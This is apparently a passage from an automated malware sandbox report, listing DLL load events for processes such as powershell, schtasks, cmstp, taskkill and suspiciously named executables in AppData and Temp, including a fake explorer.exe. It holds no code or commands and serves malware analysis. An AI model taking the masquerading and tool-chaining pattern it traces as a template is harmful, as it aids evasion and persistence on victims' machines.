                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: winrnr.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\upx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmutil.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: version.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: version.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: rtutils.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmcfg32.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: rasman.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmlua.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: comsvcs.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmstplua.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmlua.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: textinputframework.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: windowscodecs.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: thumbcache.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: textshaping.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\upx.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\upx.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\upx.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\upx.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\upx.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\upx.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Temp\ydztkyrb.exeSection loaded: mscoree.dll
                        Source: C:\Windows\Temp\ydztkyrb.exeSection loaded: apphelp.dll
                        Source: C:\Windows\Temp\ydztkyrb.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Temp\ydztkyrb.exeSection loaded: version.dll
                        Source: C:\Windows\Temp\ydztkyrb.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Temp\ydztkyrb.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Temp\ydztkyrb.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Temp\ydztkyrb.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Temp\ydztkyrb.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Temp\ydztkyrb.exeSection loaded: wldp.dll
                        Source: C:\Windows\Temp\ydztkyrb.exeSection loaded: profapi.dll
                        Source: C:\Windows\Temp\ydztkyrb.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Temp\ydztkyrb.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Temp\ydztkyrb.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Temp\ydztkyrb.exeSection loaded: textshaping.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmutil.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: version.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: version.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: rtutils.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmcfg32.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: rasman.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmlua.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: comsvcs.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmstplua.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: cmlua.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: textinputframework.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: windowscodecs.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: thumbcache.dll
                        Source: C:\Windows\System32\cmstp.exeSection loaded: textshaping.dll
                        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                        Source: C:\Windows\Temp\swtpd1aw.exeSection loaded: mscoree.dll
                        Source: C:\Windows\Temp\swtpd1aw.exeSection loaded: apphelp.dll
                        Source: C:\Windows\Temp\swtpd1aw.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Temp\swtpd1aw.exeSection loaded: version.dll
                        Source: C:\Windows\Temp\swtpd1aw.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Temp\swtpd1aw.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Temp\swtpd1aw.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\Temp\swtpd1aw.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Temp\swtpd1aw.exeSection loaded: wldp.dll
                        Source: C:\Windows\Temp\swtpd1aw.exeSection loaded: profapi.dll
                        Source: C:\Windows\Temp\swtpd1aw.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Temp\swtpd1aw.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Temp\swtpd1aw.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Temp\swtpd1aw.exeSection loaded: textshaping.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: textshaping.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: textinputframework.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Roaming\taskmoder.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: mscoree.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: napinsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: pnrpnsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: wshbth.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: nlaapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: winrnr.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: rasapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: rasman.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: rtutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: secur32.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: propsys.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: edputil.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: appresolver.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: bcp47langs.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: slc.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: sppc.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\AppData\Local\Temp\taskmen.exeSection loaded: sxs.dll
